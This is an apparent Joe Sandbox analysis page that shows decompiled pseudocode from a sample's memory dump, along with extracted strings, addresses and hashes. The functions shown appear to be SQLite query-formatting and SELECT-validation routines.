							_t281 = __edx + 1;
							do {
								_t223 =  *_t270;
								_t270 = _t270 + 1;
								__eflags = _t223;
							} while (_t223 != 0);
							_t272 = _t270 - _t281 & 0x3fffffff;
							__eflags = _t272 - 0x64;
							if(__eflags < 0) {
								__eflags = _t272;
								if(_t272 == 0) {
									goto L87;
								} else {
									_v124 = _t272;
									L00E79650( &_v116, __edx, _t272);
									_t308 = _t308 + 0xc;
									goto L20;
								}
							} else {
								_t281 = __edx;
								E00D972A0( &_v140, __edx, __eflags, _t272);
								_t308 = _t308 + 4;
								L20:
								_t287 = _v136;
								goto L21;
							}
						}
					}
				} else {
					_t227 =  *((intOrPtr*)(__edx));
					if(_t227 == 0) {
						L87:
						 *((char*)(_v124 + _t287)) = 0;
						__eflags = _v128;
						if(_v128 <= 0) {
							L90:
							_t287 = _v136;
							goto L91;
						} else {
							__eflags = _v119 & 0x00000004;
							if((_v119 & 0x00000004) != 0) {
								goto L90;
							} else {
								_t171 = E00D97330( &_v140, _t281);
								_pop(_t289);
								_pop(_t300);
								__eflags = _v8 ^ _t308;
								return E00E76672(_t171, _t237, _v8 ^ _t308, _t281, _t289, _t300);
							}
						}
					} else {
						do {
							_t281 = _t298;
							_v216 = _t281;
							while(1) {
								_t298 =  &(_t298[1]);
								if(_t227 == 0xa) {
									break;
								}
								_t227 =  *_t298;
								if(_t227 != 0) {
									continue;
								}
								break;
							}
							_t275 = _v124 + 3;
							_t314 = _t275 - _v132;
							if(_t275 < _v132) {
								_t228 = "-- "; // 0x2d2d
								_v124 = _t275;
								 *((short*)(_t275 + _t287 - 3)) = _t228;
								_t229 =  *0xec721a; // 0x20
								 *((char*)(_t275 + _t287 - 1)) = _t229;
							} else {
								E00D972A0( &_v140, "-- ", _t314, 3);
								_t281 = _v216;
								_t308 = _t308 + 4;
							}
							_t277 = _t298 - _t281;
							_t231 = _v124 + _t277;
							_t315 = _t231 - _v132;
							if(_t231 < _v132) {
								__eflags = _t277;
								if(__eflags != 0) {
									_v124 = _t231;
									__eflags = _t231 - _t277 + _v136;
									L00E79650(_t231 - _t277 + _v136, _t281, _t277);
									_t308 = _t308 + 0xc;
								}
							} else {
								E00D972A0( &_v140, _t281, _t315, _t277);
								_t308 = _t308 + 4;
							}
							_t227 =  *_t298;
							_t287 = _v136;
						} while (_t227 != 0);
						L21:
						if(_v120 == 0) {
							__eflags = _t287;
							if(_t287 == 0) {
								L91:
								_pop(_t288);
								_pop(_t299);
								__eflags = _v8 ^ _t308;
								return E00E76672(_t287, _t237, _v8 ^ _t308, _t281, _t288, _t299);
							} else {
								goto L87;
							}
						} else {
							if((_v119 & 0x00000004) == 0 || _t287 == 0) {
								L85:
								_pop(_t291);
								_pop(_t302);
								__eflags = _v8 ^ _t308;
								return E00E76672(0, _t237, _v8 ^ _t308, _t281, _t291, _t302);
							} else {
								_t248 = _v140;
								if(_t248 == 0) {
									L84:
									E00D95050(_t287);
									_t308 = _t308 + 4;
									goto L85;
								} else {
									if( *((intOrPtr*)(_t248 + 0x1d0)) == 0) {
										__eflags = _t287 -  *((intOrPtr*)(_t248 + 0x128));
										if(_t287 <  *((intOrPtr*)(_t248 + 0x128))) {
											goto L84;
										} else {
											__eflags = _t287 -  *((intOrPtr*)(_t248 + 0x12c));
											if(_t287 >=  *((intOrPtr*)(_t248 + 0x12c))) {
												goto L84;
											} else {
												 *_t287 =  *(_t248 + 0x124);
												 *(_t248 + 0x124) = _t287;
												_pop(_t293);
												_pop(_t303);
												__eflags = _v8 ^ _t308;
												return E00E76672(0, _t237, _v8 ^ _t308, _t281, _t293, _t303);
											}
										}
									} else {
										E00D950C0(_t248, _t287);
										_pop(_t295);
										_pop(_t304);
										return E00E76672(0, _t237, _v8 ^ _t308, _t287, _t295, _t304);
									}
								}
							}
						}
					}
				}
			}

0x00dbdcf0
0x00dbdcf6
0x00dbdcfc
0x00dbdd03
0x00dbdd0b
0x00dbdd0d
0x00dbdd11
0x00dbdd14
0x00dbdd1b
0x00dbdd23
0x00dbdd2e
0x00dbdd32
0x00dbdd3a
0x00dbdd42
0x00dbdd46
0x00dbdd4e
0x00dbdd5c
0x00dbdd60
0x00dbde07
0x00dbde0c
0x00dbdebd
0x00dbdec0
0x00000000
0x00dbdec6
0x00dbdec6
0x00dbded0
0x00dbded0
0x00dbded0
0x00dbded2
0x00dbdeda
0x00dbdedc
0x00dbdee0
0x00dbdee4
0x00dbdeea
0x00dbdeef
0x00dbdef7
0x00dbdef9
0x00dbdefd
0x00000000
0x00000000
0x00dbdf03
0x00dbdf05
0x00dbdf07
0x00dbdf0b
0x00dbdf0f
0x00dbdf12
0x00000000
0x00000000
0x00dbdf14
0x00dbdf1a
0x00dbdf1e
0x00dbdf20
0x00dbdf24
0x00dbdf37
0x00dbdf39
0x00dbdf3b
0x00dbdf42
0x00dbdf46
0x00dbdf4b
0x00000000
0x00dbdf4b
0x00dbdf26
0x00dbdf27
0x00dbdf2d
0x00dbdf32
0x00dbdf4e
0x00dbdf4e
0x00dbdf52
0x00dbdf52
0x00dbdf56
0x00dbdf5a
0x00dbdf5c
0x00dbdf5e
0x00dbdf64
0x00dbdf67
0x00dbdf8a
0x00dbdf90
0x00dbdf95
0x00dbdf99
0x00000000
0x00dbdf69
0x00dbdf69
0x00dbdf6c
0x00dbdf80
0x00dbdf9c
0x00dbdf9c
0x00dbdf6e
0x00dbdf71
0x00dbdf75
0x00dbdf7a
0x00dbdf7a
0x00dbdf6c
0x00dbdfa0
0x00dbdfa4
0x00dbdfa7
0x00dbdfb2
0x00dbdfb9
0x00dbdfbc
0x00dbdfc0
0x00dbdfc3
0x00dbdfc7
0x00dbdfca
0x00dbe002
0x00dbe005
0x00dbe023
0x00dbe026
0x00dbe04b
0x00dbe04e
0x00dbe108
0x00dbe10e
0x00dbe12d
0x00dbe130
0x00dbe134
0x00dbe150
0x00dbe154
0x00dbe136
0x00dbe138
0x00dbe141
0x00dbe146
0x00dbe146
0x00dbe15d
0x00dbe15f
0x00dbe162
0x00dbe166
0x00dbe168
0x00dbe16a
0x00dbe170
0x00dbe182
0x00dbe187
0x00dbe188
0x00dbe18b
0x00dbe18b
0x00dbe191
0x00dbe191
0x00dbe199
0x00dbe19a
0x00dbe19e
0x00dbe1b9
0x00dbe1bd
0x00dbe1a0
0x00dbe1a2
0x00dbe1ab
0x00dbe1b0
0x00dbe1b0
0x00dbe110
0x00dbe11c
0x00dbe121
0x00dbe121
0x00dbe054
0x00dbe054
0x00dbe058
0x00dbe05b
0x00dbe05f
0x00dbe062
0x00dbe064
0x00dbe071
0x00dbe077
0x00dbe07c
0x00dbe081
0x00dbe088
0x00dbe08b
0x00dbe090
0x00dbe093
0x00dbe098
0x00dbe09a
0x00dbe09f
0x00dbe0a1
0x00dbe0a7
0x00dbe0ac
0x00dbe0af
0x00dbe0b1
0x00dbe0b6
0x00dbe0b6
0x00dbe0af
0x00dbe09f
0x00dbe0be
0x00dbe0be
0x00dbe0c2
0x00dbe0d2
0x00dbe0d7
0x00dbe0da
0x00dbe0df
0x00dbe0e5
0x00dbe0ed
0x00dbe0fa
0x00dbe0fe
0x00dbe0ef
0x00dbe0ef
0x00dbe0f4
0x00000000
0x00000000
0x00dbe0f4
0x00dbe0ed
0x00dbe0df
0x00dbe028
0x00dbe028
0x00dbe033
0x00dbe038
0x00dbe03d
0x00dbe03e
0x00dbe043
0x00dbe043
0x00dbe007
0x00dbe007
0x00dbe016
0x00dbe01b
0x00dbe01b
0x00dbdfcc
0x00dbdfd0
0x00dbdfd3
0x00dbdfd7
0x00dbdff1
0x00dbdff5
0x00dbdfd9
0x00dbdfdb
0x00dbdfe4
0x00dbdfe9
0x00dbdfe9
0x00dbdfd7
0x00dbe1c2
0x00dbe1c5
0x00000000
0x00dbe1cb
0x00dbe1cb
0x00000000
0x00dbe1cb
0x00dbe1c5
0x00000000
0x00dbdf5e
0x00dbdf16
0x00000000
0x00dbdf16
0x00dbded0
0x00dbde12
0x00dbde12
0x00dbde14
0x00000000
0x00dbde1a
0x00dbde1a
0x00dbde1c
0x00dbde20
0x00dbde20
0x00dbde22
0x00dbde23
0x00dbde23
0x00dbde29
0x00dbde2f
0x00dbde32
0x00dbde9d
0x00dbde9f
0x00000000
0x00dbdea5
0x00dbdead
0x00dbdeb3
0x00dbdeb8
0x00000000
0x00dbdeb8
0x00dbde34
0x00dbde35
0x00dbde3b
0x00dbde40
0x00dbde43
0x00dbde43
0x00000000
0x00dbde43
0x00dbde32
0x00dbde14
0x00dbdd66
0x00dbdd66
0x00dbdd6a
0x00dbe22f
0x00dbe233
0x00dbe237
0x00dbe23c
0x00dbe262
0x00dbe262
0x00000000
0x00dbe23e
0x00dbe23e
0x00dbe243
0x00000000
0x00dbe245
0x00dbe249
0x00dbe24e
0x00dbe24f
0x00dbe257
0x00dbe261
0x00dbe261
0x00dbe243
0x00dbdd70
0x00dbdd70
0x00dbdd70
0x00dbdd72
0x00dbdd76
0x00dbdd76
0x00dbdd79
0x00000000
0x00000000
0x00dbdd7b
0x00dbdd7f
0x00000000
0x00000000
0x00000000
0x00dbdd7f
0x00dbdd85
0x00dbdd88
0x00dbdd8c
0x00dbdda7
0x00dbddad
0x00dbddb1
0x00dbddb6
0x00dbddbb
0x00dbdd8e
0x00dbdd99
0x00dbdd9e
0x00dbdda2
0x00dbdda2
0x00dbddc5
0x00dbddc7
0x00dbddc9
0x00dbddcd
0x00dbddde
0x00dbdde0
0x00dbdde2
0x00dbdde8
0x00dbddef
0x00dbddf4
0x00dbddf4
0x00dbddcf
0x00dbddd4
0x00dbddd9
0x00dbddd9
0x00dbddf7
0x00dbddf9
0x00dbddfd
0x00dbde47
0x00dbde4c
0x00dbe22b
0x00dbe22d
0x00dbe266
0x00dbe26f
0x00dbe270
0x00dbe271
0x00dbe27b
0x00000000
0x00000000
0x00000000
0x00dbde52
0x00dbde57
0x00dbe213
0x00dbe217
0x00dbe218
0x00dbe220
0x00dbe22a
0x00dbde65
0x00dbde65
0x00dbde6b
0x00dbe20a
0x00dbe20b
0x00dbe210
0x00000000
0x00dbde71
0x00dbde78
0x00dbe1d4
0x00dbe1da
0x00000000
0x00dbe1dc
0x00dbe1dc
0x00dbe1e2
0x00000000
0x00dbe1e4
0x00dbe1ea
0x00dbe1ec
0x00dbe1f6
0x00dbe1f7
0x00dbe1ff
0x00dbe209
0x00dbe209
0x00dbe1e2
0x00dbde7e
0x00dbde80
0x00dbde89
0x00dbde8a
0x00dbde9c
0x00dbde9c
0x00dbde78
0x00dbde6b
0x00dbde57
0x00dbde4c
0x00dbdd6a

Strings

%lld, xrefs: 00DBE010
%!.15g, xrefs: 00DBE038
-- , xrefs: 00DBDD90, 00DBDDA7
'%.*q', xrefs: 00DBE0CC
@r, xrefs: 00DBE1A2
NULL, xrefs: 00DBDFDB
4r, xrefs: 00DBE138
d, xrefs: 00DBDD3A
`$, xrefs: 00DBE0E5
NULL, xrefs: 00DBDFF5
zeroblob(%d), xrefs: 00DBE116
%02x, xrefs: 00DBE17C

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %!.15g$%02x$%lld$'%.*q'$-- $4r$@r$NULL$NULL$`$$d$zeroblob(%d)
API String ID: 0-2116238255
Opcode ID: a65d740873d4fa070b0a8bedf723ae3b6dece5b199bb98dd1b3ca46c56568436
Instruction ID: 582eceaff24ac5bc59ab12d2b405248c4c9519fb726cf0bdf5c8ff75e1429e7f
Opcode Fuzzy Hash: a65d740873d4fa070b0a8bedf723ae3b6dece5b199bb98dd1b3ca46c56568436
Instruction Fuzzy Hash: 63F1AC71908340CBD724DF28D445BAAB7E6EFC5304F28492DF8DA97261E731D945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DCB0D0 Relevance: 12.9, Strings: 10, Instructions: 356
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E00DCB0D0(void* __ebx, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				signed int _v24;
				signed int _v36;
				intOrPtr _v44;
				signed int* _v48;
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr* _v100;
				void* __edi;
				void* __esi;
				signed int _t161;
				signed char _t163;
				signed short _t164;
				signed int _t168;
				signed int _t171;
				signed int* _t172;
				signed int _t175;
				signed int _t180;
				signed int _t181;
				signed int* _t182;
				intOrPtr _t184;
				signed int _t185;
				signed int _t189;
				char* _t190;
				signed int _t192;
				signed int _t195;
				intOrPtr _t196;
				signed int _t201;
				signed int _t204;
				signed int _t205;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				intOrPtr _t215;
				signed int _t216;
				void* _t223;
				intOrPtr* _t224;
				signed int _t228;
				signed short _t233;
				intOrPtr* _t239;
				signed int _t243;
				intOrPtr _t244;
				signed int _t248;
				signed int _t249;
				intOrPtr _t252;
				signed int _t253;
				signed int _t254;
				signed int _t257;
				intOrPtr _t260;
				intOrPtr _t261;
				signed int _t263;
				void* _t264;
				void* _t265;
				void* _t266;
				signed int* _t267;
				signed int* _t268;
				void* _t270;
				void* _t271;
				void* _t272;
				signed int _t273;
				signed int _t274;
				void* _t275;
				void* _t276;
				void* _t277;
				signed int _t278;
				signed int _t281;
				signed int _t282;
				signed int _t284;

				_t223 = __ebx;
				_t284 = (_t282 & 0xfffffff0) - 0x68;
				_t161 =  *0xed8944; // 0xccebfc3b
				_v8 = _t161 ^ _t284;
				_t224 = _a4;
				_t263 = _a8;
				_v76 = _t263;
				_t163 =  *(_t263 + 8);
				if((_t163 & 0x00000004) != 0) {
					L79:
					_t164 = 1;
					goto L80;
				} else {
					_t271 =  *_t224;
					_t258 =  *((intOrPtr*)(_t224 + 0x18));
					_v96 =  *((intOrPtr*)(_t224 + 0x18));
					_v100 = _t271;
					_v80 =  *_t271;
					if((_t163 & 0x00000040) != 0) {
						_t228 =  *(_t263 + 0x30);
						__eflags = _t228;
						_v60 = _t228;
						_v72 = 0;
						_t22 = _t228 != 0;
						__eflags = _t22;
						_v56 = _t263;
						_v64 = 0 | _t22;
						while(1) {
							 *(_t263 + 8) =  *(_t263 + 8) | 0x00000004;
							asm("xorps xmm0, xmm0");
							asm("movaps [esp+0x40], xmm0");
							asm("movaps [esp+0x50], xmm0");
							_v52 = _t271;
							_t259 =  *(_t263 + 0x38);
							_t168 = E00DCB570( &_v52,  *(_t263 + 0x38));
							__eflags = _t168;
							if(_t168 != 0) {
								goto L4;
							}
							_t259 =  *(_t263 + 0x3c);
							_t171 = E00DCB570( &_v52,  *(_t263 + 0x3c));
							__eflags = _t171;
							if(_t171 != 0) {
								goto L4;
							} else {
								__eflags =  *(_t263 + 8) & 0x00010000;
								if(( *(_t263 + 8) & 0x00010000) != 0) {
									 *((intOrPtr*)(( *(_t263 + 0x1c))[7] + 0x2c)) =  *((intOrPtr*)(_t263 + 0x2c));
									 *((intOrPtr*)(_t263 + 0x2c)) = 0;
								}
								_t172 =  *(_t263 + 0x1c);
								_t260 = 0;
								_v92 = 0;
								__eflags =  *_t172;
								if( *_t172 <= 0) {
									L23:
									_t233 = 1;
									_v24 = 1;
									_v48 =  *(_t263 + 0x1c);
									_v36 = _v96;
									_t175 =  *_t263;
									_v84 = _t175;
									__eflags = _t175;
									if(_t175 == 0) {
										L29:
										_t273 =  *(_t263 + 0x24);
										_v68 = _t273;
										__eflags = _t273;
										if(_t273 != 0) {
											L32:
											_t91 = _t263 + 8;
											 *_t91 =  *(_t263 + 8) | _v24 & 0x00001000 | 0x00000008;
											__eflags =  *_t91;
										} else {
											__eflags = _v24 & 0x00000010;
											if((_v24 & 0x00000010) != 0) {
												goto L32;
											} else {
												_v24 = _t233 & 0x0000fffe;
											}
										}
										__eflags =  *(_t263 + 0x28);
										if( *(_t263 + 0x28) == 0) {
											L35:
											_v44 =  *_t263;
											_t259 =  *(_t263 + 0x28);
											_t180 = E00DCB570( &_v52,  *(_t263 + 0x28));
											__eflags = _t180;
											if(_t180 != 0) {
												goto L4;
											} else {
												_t259 =  *(_t263 + 0x20);
												_t181 = E00DCB570( &_v52,  *(_t263 + 0x20));
												__eflags = _t181;
												if(_t181 != 0) {
													goto L4;
												} else {
													_t182 =  *(_t263 + 0x1c);
													_t259 = 0;
													_v88 = 0;
													__eflags =  *_t182;
													if( *_t182 <= 0) {
														L48:
														_v24 = _v24 | 0x00000001;
														_v36 = 0;
														__eflags =  *(_t263 + 8) & 0x00010000;
														if(( *(_t263 + 8) & 0x00010000) != 0) {
															_t243 = ( *(_t263 + 0x1c))[7];
															 *((intOrPtr*)(_t263 + 0x2c)) =  *((intOrPtr*)(_t243 + 0x2c));
															 *((intOrPtr*)(_t243 + 0x2c)) = 0;
														}
														__eflags = _v64 - _v72;
														if(_v64 > _v72) {
															L52:
															_t184 = _v80;
															__eflags =  *((char*)(_t184 + 0x49));
															if( *((char*)(_t184 + 0x49)) != 0) {
																goto L4;
															} else {
																__eflags = _t273;
																if(_t273 == 0) {
																	L60:
																	_t257 =  *(_t263 + 0x34);
																	__eflags = _t257;
																	if(_t257 == 0) {
																		L62:
																		_t263 =  *(_t263 + 0x30);
																		_v72 = _v72 + 1;
																		_v76 = _t263;
																		__eflags = _t263;
																		if(_t263 == 0) {
																			__eflags = _v60;
																			if(_v60 == 0) {
																				goto L79;
																			} else {
																				_t259 = _v56;
																				_t185 = E00DCAA90(_v100, _v56);
																				__eflags = _t185;
																				if(_t185 != 0) {
																					goto L4;
																				} else {
																					goto L79;
																				}
																			}
																		} else {
																			_t271 = _v100;
																			continue;
																		}
																	} else {
																		__eflags =  *( *_t263) -  *((intOrPtr*)( *_t257));
																		if( *( *_t263) !=  *((intOrPtr*)( *_t257))) {
																			__eflags =  *(_t257 + 8) & 0x00000200;
																			if(__eflags == 0) {
																				_t189 = ( *(_t257 + 4) & 0x000000ff) - 0x74;
																				__eflags = _t189;
																				if(__eflags == 0) {
																					_t190 = "UNION ALL";
																				} else {
																					_t192 = _t189 - 1;
																					__eflags = _t192;
																					if(__eflags == 0) {
																						_t190 = "EXCEPT";
																					} else {
																						__eflags = _t192 - 1;
																						if(__eflags == 0) {
																							_t190 = "INTERSECT";
																						} else {
																							_t190 = "UNION";
																						}
																					}
																				}
																				E00D981E0(__eflags, _v100, "SELECTs to the left and right of %s do not have the same number of result columns", _t190);
																				_t284 = _t284 + 0xc;
																			} else {
																				_push("all VALUES must have the same number of terms");
																				_push(_v100);
																				E00D981E0(__eflags);
																				_t284 = _t284 + 8;
																			}
																			goto L4;
																		} else {
																			goto L62;
																		}
																	}
																} else {
																	_t259 = _t263;
																	_t195 = L00DCAF30( &_v52, _t263, _t273, "GROUP");
																	_t284 = _t284 + 8;
																	__eflags = _t195;
																	if(_t195 != 0) {
																		goto L4;
																	} else {
																		_t196 = _v80;
																		__eflags =  *((char*)(_t196 + 0x49));
																		if( *((char*)(_t196 + 0x49)) != 0) {
																			goto L4;
																		} else {
																			_t239 = _t273 + 4;
																			_t260 = 0;
																			_t274 =  *_t273;
																			__eflags = _t274;
																			if(_t274 <= 0) {
																				goto L60;
																			} else {
																				while(1) {
																					__eflags =  *( *_t239 + 4) & 0x00000002;
																					if(__eflags != 0) {
																						break;
																					}
																					_t260 = _t260 + 1;
																					_t239 = _t239 + 0x18;
																					__eflags = _t260 - _t274;
																					if(_t260 < _t274) {
																						continue;
																					} else {
																						goto L60;
																					}
																					goto L81;
																				}
																				_push("aggregate functions are not allowed in the GROUP BY clause");
																				goto L65;
																			}
																		}
																	}
																}
															}
														} else {
															_t259 = _t263;
															_t201 = L00DCAF30( &_v52, _t263,  *((intOrPtr*)(_t263 + 0x2c)), "ORDER");
															_t284 = _t284 + 8;
															__eflags = _t201;
															if(_t201 != 0) {
																goto L4;
															} else {
																goto L52;
															}
														}
													} else {
														_t244 = 0;
														__eflags = 0;
														_v92 = 0;
														do {
															__eflags =  *(_t182 + _t244 + 0x30) & 0x00000004;
															if(( *(_t182 + _t244 + 0x30) & 0x00000004) == 0) {
																goto L46;
															} else {
																_t204 =  *(_t182 + _t244 + 0x50);
																_v84 = _t204;
																__eflags = _t204;
																if(_t204 == 0) {
																	goto L46;
																} else {
																	_t276 = 0;
																	__eflags =  *_t204;
																	if( *_t204 <= 0) {
																		goto L46;
																	} else {
																		_t267 = _t204 + 4;
																		while(1) {
																			_t259 =  *_t267;
																			_t205 = E00DCB570( &_v52,  *_t267);
																			__eflags = _t205;
																			if(_t205 != 0) {
																				goto L4;
																			}
																			_t276 = _t276 + 1;
																			_t267 =  &(_t267[6]);
																			__eflags = _t276 -  *_v84;
																			if(_t276 <  *_v84) {
																				continue;
																			} else {
																				_t263 = _v76;
																				_t244 = _v92;
																				_t259 = _v88;
																				goto L46;
																			}
																			goto L81;
																		}
																		goto L4;
																	}
																}
															}
															goto L81;
															L46:
															_t182 =  *(_t263 + 0x1c);
															_t259 = _t259 + 1;
															_t244 = _t244 + 0x50;
															_v88 = _t259;
															_v92 = _t244;
															__eflags = _t259 -  *_t182;
														} while (_t259 <  *_t182);
														_t273 = _v68;
														goto L48;
													}
												}
											}
										} else {
											__eflags = _t273;
											if(__eflags == 0) {
												_push("a GROUP BY clause is required before HAVING");
												L65:
												_push(_v100);
												E00D981E0(__eflags);
												_pop(_t266);
												_pop(_t275);
												__eflags = _v8 ^ _t284 + 0x00000008;
												return E00E76672(2, _t223, _v8 ^ _t284 + 0x00000008, _t260, _t266, _t275);
											} else {
												goto L35;
											}
										}
									} else {
										_t277 = 0;
										__eflags =  *_t175;
										if( *_t175 <= 0) {
											goto L29;
										} else {
											_t268 = _t175 + 4;
											while(1) {
												_t259 =  *_t268;
												_t208 = E00DCB570( &_v52,  *_t268);
												__eflags = _t208;
												if(_t208 != 0) {
													goto L4;
												}
												_t277 = _t277 + 1;
												_t268 =  &(_t268[6]);
												__eflags = _t277 -  *_v84;
												if(_t277 <  *_v84) {
													continue;
												} else {
													_t233 = _v24;
													_t263 = _v76;
													goto L29;
												}
												goto L81;
											}
											goto L4;
										}
									}
								} else {
									_t248 = 0;
									__eflags = 0;
									_v88 = 0;
									do {
										_t249 = _t172 + _t248;
										_v84 = _t249;
										__eflags =  *(_t249 + 0x1c);
										if( *(_t249 + 0x1c) == 0) {
											goto L22;
										} else {
											_t261 = _v100;
											_t278 = 0;
											_v68 =  *(_t261 + 0x1b8);
											_t211 = _v96;
											__eflags = _t211;
											while(_t211 != 0) {
												_t278 = _t278 +  *((intOrPtr*)(_t211 + 0x14));
												_t211 =  *(_t211 + 0x10);
												__eflags = _t211;
											}
											_t212 =  *(_t249 + 0x10);
											__eflags = _t212;
											if(__eflags != 0) {
												 *(_t261 + 0x1b8) = _t212;
											}
											_t259 =  *(_t249 + 0x1c);
											E00DCB650(_t223, _v100, _t263, _t278, __eflags, _v96);
											_t252 = _v100;
											_t284 = _t284 + 4;
											__eflags =  *(_t252 + 0x24);
											 *(_t252 + 0x1b8) = _v68;
											if( *(_t252 + 0x24) != 0) {
												goto L4;
											} else {
												_t215 = _v80;
												__eflags =  *((char*)(_t215 + 0x49));
												if( *((char*)(_t215 + 0x49)) != 0) {
													goto L4;
												} else {
													_t253 = _v96;
													_t216 = _t253;
													__eflags = _t253;
													if(_t253 != 0) {
														do {
															_t278 = _t278 -  *((intOrPtr*)(_t216 + 0x14));
															_t216 =  *(_t216 + 0x10);
															__eflags = _t216;
														} while (_t216 != 0);
													}
													_t254 = _v84;
													_t260 = _v92;
													asm("sbb esi, esi");
													_t281 =  ~_t278 & 0x00000008 |  *(_t254 + 0x30) & 0xfffffff7;
													__eflags = _t281;
													 *(_t254 + 0x30) = _t281;
													_t172 =  *(_t263 + 0x1c);
													goto L22;
												}
											}
										}
										goto L81;
										L22:
										_t260 = _t260 + 1;
										_t248 = _v88 + 0x50;
										_v92 = _t260;
										_v88 = _t248;
										__eflags = _t260 -  *_t172;
									} while (_t260 <  *_t172);
									goto L23;
								}
							}
							goto L81;
						}
						goto L4;
					} else {
						_t259 = _t263;
						E00E01AD0(_t271, _t263, _t258);
						_t284 = _t284 + 4;
						if( *((intOrPtr*)(_t271 + 0x24)) != 0) {
							L4:
							_pop(_t265);
							_pop(_t272);
							return E00E76672(2, _t223, _v8 ^ _t284, _t259, _t265, _t272);
						} else {
							_t164 = 1;
							if( *((char*)(_v80 + 0x49)) == 0) {
								L80:
								_pop(_t264);
								_pop(_t270);
								__eflags = _v8 ^ _t284;
								return E00E76672(_t164, _t223, _v8 ^ _t284, _t257, _t264, _t270);
							} else {
								goto L4;
							}
						}
					}
				}
				L81:
			}

0x00dcb0d0
0x00dcb0d6
0x00dcb0d9
0x00dcb0e0
0x00dcb0e4
0x00dcb0e9
0x00dcb0ec
0x00dcb0f0
0x00dcb0f5
0x00dcb55a
0x00dcb55a
0x00000000
0x00dcb0fb
0x00dcb0fb
0x00dcb0fd
0x00dcb100
0x00dcb104
0x00dcb10a
0x00dcb110
0x00dcb14e
0x00dcb153
0x00dcb155
0x00dcb159
0x00dcb161
0x00dcb161
0x00dcb164
0x00dcb168
0x00dcb170
0x00dcb170
0x00dcb178
0x00dcb17b
0x00dcb180
0x00dcb185
0x00dcb189
0x00dcb18c
0x00dcb191
0x00dcb193
0x00000000
0x00000000
0x00dcb195
0x00dcb19c
0x00dcb1a1
0x00dcb1a3
0x00000000
0x00dcb1a5
0x00dcb1a5
0x00dcb1ac
0x00dcb1b7
0x00dcb1ba
0x00dcb1ba
0x00dcb1c1
0x00dcb1c4
0x00dcb1c6
0x00dcb1ca
0x00dcb1cc
0x00dcb2a1
0x00dcb2a1
0x00dcb2a6
0x00dcb2ae
0x00dcb2b6
0x00dcb2ba
0x00dcb2bc
0x00dcb2c0
0x00dcb2c2
0x00dcb2f8
0x00dcb2f8
0x00dcb2fb
0x00dcb2ff
0x00dcb301
0x00dcb319
0x00dcb325
0x00dcb325
0x00dcb325
0x00dcb303
0x00dcb303
0x00dcb308
0x00000000
0x00dcb30a
0x00dcb312
0x00dcb312
0x00dcb308
0x00dcb328
0x00dcb32c
0x00dcb336
0x00dcb33c
0x00dcb340
0x00dcb343
0x00dcb348
0x00dcb34a
0x00000000
0x00dcb350
0x00dcb350
0x00dcb357
0x00dcb35c
0x00dcb35e
0x00000000
0x00dcb364
0x00dcb364
0x00dcb367
0x00dcb369
0x00dcb36d
0x00dcb36f
0x00dcb3d5
0x00dcb3d5
0x00dcb3db
0x00dcb3e3
0x00dcb3ea
0x00dcb3ef
0x00dcb3f5
0x00dcb3f8
0x00dcb3f8
0x00dcb403
0x00dcb407
0x00dcb427
0x00dcb427
0x00dcb42b
0x00dcb42f
0x00000000
0x00dcb435
0x00dcb435
0x00dcb437
0x00dcb480
0x00dcb480
0x00dcb483
0x00dcb485
0x00dcb491
0x00dcb491
0x00dcb494
0x00dcb498
0x00dcb49c
0x00dcb49e
0x00dcb53e
0x00dcb543
0x00000000
0x00dcb545
0x00dcb545
0x00dcb54d
0x00dcb552
0x00dcb554
0x00000000
0x00000000
0x00000000
0x00000000
0x00dcb554
0x00dcb4a4
0x00dcb4a4
0x00000000
0x00dcb4a4
0x00dcb487
0x00dcb48d
0x00dcb48f
0x00dcb4db
0x00dcb4e2
0x00dcb4fe
0x00dcb4fe
0x00dcb501
0x00dcb522
0x00dcb503
0x00dcb503
0x00dcb503
0x00dcb506
0x00dcb51b
0x00dcb508
0x00dcb508
0x00dcb50b
0x00dcb514
0x00dcb50d
0x00dcb50d
0x00dcb50d
0x00dcb50b
0x00dcb506
0x00dcb531
0x00dcb536
0x00dcb4e4
0x00dcb4e4
0x00dcb4e9
0x00dcb4ed
0x00dcb4f2
0x00dcb4f2
0x00000000
0x00000000
0x00000000
0x00000000
0x00dcb48f
0x00dcb439
0x00dcb43f
0x00dcb445
0x00dcb44a
0x00dcb44d
0x00dcb44f
0x00000000
0x00dcb455
0x00dcb455
0x00dcb459
0x00dcb45d
0x00000000
0x00dcb463
0x00dcb463
0x00dcb466
0x00dcb468
0x00dcb46a
0x00dcb46c
0x00000000
0x00dcb470
0x00dcb470
0x00dcb472
0x00dcb476
0x00000000
0x00000000
0x00dcb478
0x00dcb479
0x00dcb47c
0x00dcb47e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00dcb47e
0x00dcb4d4
0x00000000
0x00dcb4d4
0x00dcb46c
0x00dcb45d
0x00dcb44f
0x00dcb437
0x00dcb409
0x00dcb411
0x00dcb417
0x00dcb41c
0x00dcb41f
0x00dcb421
0x00000000
0x00000000
0x00000000
0x00000000
0x00dcb421
0x00dcb371
0x00dcb371
0x00dcb371
0x00dcb373
0x00dcb377
0x00dcb377
0x00dcb37c
0x00000000
0x00dcb37e
0x00dcb37e
0x00dcb382
0x00dcb386
0x00dcb388
0x00000000
0x00dcb38a
0x00dcb38a
0x00dcb38c
0x00dcb38e
0x00000000
0x00dcb390
0x00dcb390
0x00dcb393
0x00dcb393
0x00dcb399
0x00dcb39e
